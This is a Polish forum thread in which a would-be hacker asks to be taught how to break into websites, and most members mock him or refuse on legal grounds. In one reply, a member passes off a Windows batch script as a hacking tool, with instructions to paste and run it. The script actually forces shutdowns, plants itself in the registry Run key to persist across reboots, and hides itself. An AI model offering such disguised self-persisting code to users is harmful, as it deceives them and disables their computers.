Customize

Cześć

Discussion in 'Polska' started by ZipeK, Nov 12, 2013.

Thread Status:
Not open for further replies.
  1. ZipeK Member

Witam Wszystkich,
    Więc tak zacznę od siebie, przyszedłem tu z myślą że poprawie wolność w internecie , szukałem wiele informacji o Annony i zafascynowałem się wiele for internetowych mnie oszukało o tematyce "Counter Strike" Dlatego chcę się z wami połączyć , chcę żebyście mnie nauczyli włamywać się na strony poszukuję tak jak by "nauczyciela" który mnie nauczy , wiem że to wymaga czasu i poświęcenia , dlatego szukam takiej osoby co mi pomoże oczywiście jeśli będzie trzeba zapłace "drobną" kwotą
    Nie chodzi mi o wpuszczanie tzw ddosów i niszczyć każde forum co popadnie, chcę się tylko OD WAS nauczyć .
    Kontakt:
    Gadu Gadu: 46529103
    Steam: daniel92pl
    Pozdrawiam
  2. Anonymous Member

WhyWeProtest wspiera tylko legalny aktywizm. To nie miejsce dla wannabe hakerów, źle trafiłeś. Jeśli chcesz sie dowiedziec czegos na temat tego czym jest anonymous, WWP itp. to wszystko jest przyklejonym temacie "Polski Info-Thread".
  3. ZipeK Member

Tak, a oszukanie mnie na forum? za które wyjebałem 400 zł ? Licencja+Aplikacje+ciężka praca ...
  4. Ciężka sprawa wpierw musisz sie nauczyć hakowac mikrofalowki
  5. ZipeK Member

Widać że nikt nie tu nie traktuje na poważnie ..
  6. Anonymous Member

Dziwisz sie?
  7. Jak ci wpadną na chate to wtedy będzie poważnie rozumiesz.
  8. Ja traktuję bardzo poważnie ale chwilowo nie mam czasu bo właśnie chakieróję NSA, Echelon, CIA, FBI, OMON, KGB, Mosad oraz zegarek aby mnie obudził jutro o 4 rano.

P.S.
    ZipeK, przeczytaj jeszcze raz swój post oraz regulamin tutejszego forum i pomyśl czy sam być traktował poważnie to co napisałeś przy zakładaniu tematu.
  9. Anonymous Member

Czemu nikt z Was nie pomógł mu? Jacy z Was dobroczyńcy.
    Przede wszystkim musisz się przyłożyć do pracy a na pewno zostaniesz świetnym hakerem.
    Tak jak większość z nas :)

Prawdziwy haker nie może obejść się bez programów hakerskich. My piszemy je sami, bo jesteśmy już nauczeni
    ale specjalnie dla Ciebie udostępnię kod źródłowy jednego z nich:

Code:
    @echo off 
    PING -n 2 127.0.0.1 >nul 
    start cmd.exe 
    start cmd.exe 
    PING -n 2 127.0.0.1 >nul 
    start cmd.exe 
    start cmd.exe 
    PING -n 2 127.0.0.1 >nul 
    start cmd.exe 
    start cmd.exe 
    PING -n 2 127.0.0.1 >nul 
    start cmd.exe 
    start cmd.exe 
    shutdown.exe -s -t 15 

@echo off 
    copy %0 C:\prohacker.bat 
    @echo REGEDIT4 >>a.reg 
    @echo. >>a.reg 
    @echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg 
    @echo "win.sys"="C:\\prohacker" >>a.reg 
    @echo. >>a.reg 
    regedit /s a.reg 
    dir >nul 
    del a.reg >nul 

ATTRIB +S +H +R +A prohacker.bat 
    By uruchomić taki program, musisz otworzyć Notatnik, wkleić kod programu do niego, kliknąć w menu
    "zapisz jako" a następnie zaznaczyć na dole "wszystkie pliki" i dać nazwę prohacker.bat

Program ten po uruchomieniu da Ci możliwość włamania się na stronę amerykańskiego rządu, oraz stronę polskiego prezydenta. W wersji premium sprawia, że metodą echolokacji podsłuchuje rozmowy w gabinecie Obamy.

Pozdrawiam i życzę sukcesów :)
  10. No nie nasz tajny kod źródłowy poszedł na publike jutro pół a nawet cała polska będzie sie hakowac na wzajem. Co zrobiłeś mistrzu !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
    Nawet takiego programu nie mial Cryptex team
  11. huj

co ty pieprzysz eugeniusz dobrze ci powiedzial my wszyscy tutaj zaczynalismy od hakowania mikrofalowki hakowanie to nie takie hop siup czlowiek musi uczyc sie metoda malych krokow ale ty oczywiscie ubzdurales sobie ze wyczuwasz sarkazm bo ci sie wydaje ze od razu damy ci kod na zablokowanie tego forum w calym internecie (mamy taki) i tak to kurwa jest nawet jakbys chcial czlowiekowi pomoc to i tak zawsze on nagle zmieni zdanie
  12. ZipeK Member

Tak, lecz narazie wolę nie włamywać się na Miedzy narodowe strony lecz zwykłe które nie są zbyt ważne, typu na hostngu 'xaa.pl' bo każdy zaczynał od 'hakowania mikrofalówki' jak napisałem @up
  13. [IMG]

Jego głupie pytanie wynika z jakiegokolwiek braku znajomości informatyki. A wy się z niego śmiejecie, żarty żartami ale to zaczyna już nie być śmieszne! Po pierwsze, jak już musiałeś się zapytać to nie trzeba było pchać na siłę tych wypoconych głupot. Po drugie jeżeli się nie domyśliłeś, że się z ciebie nabijają to daj sobie spokój bo ci najważniejszy organ zanika. Polecam najpierw go obudzić np. czytając książki. Po trzecie włamywania się nie nauczysz nie znając chociaż by podstaw. Po trzecie hakerzy to nie są ludzie którzy tylko i wyłącznie potrafią się włamywać. Haker to informatyk. Po czwarte jeżeli chcesz się koniecznie nauczyć, chociaż wątpię czy to pojmiesz i moje zdanie na ten temat jest takie byś wracał do lekcji i na razie sobie odpuścił. Ale jeżeli już nalegasz najpierw tak na początek naucz się podstaw obsługi komputera i sposobu w jaki on działa. Po piąte zacznij korzystać z przyjaznego linuxa i naucz się z niego korzystać i komend linuxa się naucz bo to podstawa. Po szóste nie zabijaj. Po siódme zacznij uczyć się języków najpierw i koniecznie Angielskiego, jak już go opanujesz na średnim poziomie zacznij uczyć się języków programowania. Ale zanim to zrobisz, żeby w jakikolwiek zaznajomić się z programowaniem zacznij najpierw od języka html, tu jeszcze przyda ci się znajomość css (cascading Style Sheets) no i teraz kolejne ale tutaj zależy od tego co chcesz robić i tutaj wymieniam ci: C++ JavaScript PHP tu akurat jest tego sporo więc sam musisz sobie wybrać, jeżeli nie wiesz jaki zapytaj się nauczyciela informatyki tylko normalnie bo cię wyśmieje, albo do psychologa zaprowadzi.

html http://www.kurshtml.edu.pl/html/zielony.html
    i jeszcze masz z extansible ale to po kursie html zielonych http://webhosting.pl/Kurs.XHTML..Formatujemy.strony.WWW?page=1

Jeżeli php tołap: http://webmade.org/kursy-online/kurs-php.php
    Jeżeli C++ http://cpp0x.pl/kursy/Kurs-C /1
    Jeżeli inne to poszukaj sobie sam nie zabieraj mi czasu i ciesz się, ze cie nie wyśmiałem jak inni.
    Linuxa też musisz sobie sam znaleźć bo nie wiem jaki będzie ci odpowiadał
    A dalej już sam będziesz wiedział czego się uczyć. Aha i pamiętaj nie bądź egoistyczny ja już to wszystko pojmiesz dziel się i służ pomocą, bo jak sam widzisz co się dzieje zgraja egoistów i prześmiewców świata.

Co do was. To byście się wstydzili! Zamiast mu pomóc co prawda w żartach dostał wskazówki ale jeżeli nie jest na tyle bystry to się nie domyśli, wyśmialiście go. A przypomnijcie sobie swoje początki? Miło było by wam jak by się z was nabijali? Śmiejecie się zamiast wytłumaczyć mu jak to działa i co trzeba najpierw osiągnąć by dojść do takiego poziomu, a sami też do bystrych nie należycie! Dajcie sobie trochę luzu co?
  14. ZipeK Member

Dziękuję wiem , czeka mnie wiele nauki jak każdego , i myślę że tylko Ty @up mi pomogłeś ..
  15. Anonymous Member

Widze, że ten troll thread wannabe haksi musi zostac zamknięty. Zasady forum są jasne i nie ma tu przyzwolenia na planowanie i pomaganie w jakicholwiek nielegalnych działaniach. Ostrzegałem...
Thread Status:
Not open for further replies.

Share This Page

Customize Theme Colors

Close

Choose a color via Color picker or click the predefined style names!

Primary Color :

Secondary Color :
Predefined Skins